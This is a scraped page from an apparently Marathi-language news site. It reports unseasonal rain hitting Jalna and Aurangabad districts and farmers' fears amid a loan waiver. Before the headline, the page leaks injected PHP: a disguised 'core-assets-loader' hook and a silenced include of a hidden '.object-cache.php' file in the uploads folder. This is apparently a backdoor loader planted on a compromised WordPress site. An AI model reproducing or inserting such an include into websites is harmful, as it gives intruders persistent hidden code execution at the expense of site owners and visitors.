add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); कर्जमाफीसोबत बळीराजाच्या दारात अवकाळीचे संकट! – SOCH INDIA
Menu

देश
कर्जमाफीसोबत बळीराजाच्या दारात अवकाळीचे संकट!

nobanner

औरंगाबाद आणि जालना जिल्ह्यातील विविध भागांना अवकाळी पावसाचा तडाखा बसला आहे. जालना जिल्ह्यातील घनसावंगीत, अंबडला अवकाळी पावसाने दणका दिला आहे. औरंगाबाद शहरातही पाऊस सुरू झाला आहे. वाळूज, सिल्लोडसह जवळपासच्या संपूर्ण परिसरात पाऊस धडकला असून या पावसाने बळीराजा धास्तावला आहे. एकीकडे शेतकरी कर्जमाफीचा दिलासा मिळत असताना अवकाळी पावसाचे संकट बळीराजाच्या दारात उभे ठाकले आहे.

जालन्यातील घनसावंगी, अंबड, बदनापूर, भोकरदन आणि जालना शहर व औद्योगिक वसाहत परिसरात शनिवारी रात्री ९:४५ च्या सुमारास अवकाळी पावसाने हजेरी लावली. अंबड शहर व परिसरातील गावात तसेच घनसावंगी परिसरात सुमारे दहा मिनिटे जोरदार पाऊस झाला तर याच सुमारास बदनापूर आणि जालन्यातील औरंगाबाद रस्त्यावर असलेल्या औद्योगिक वसाहत क्षेत्रात रिमझिम पाऊस झाला. नवीन जालन्यात रात्री १०:३० नंतर पाऊस झाला यावेळी वीजपुरवठा खंडित झाला.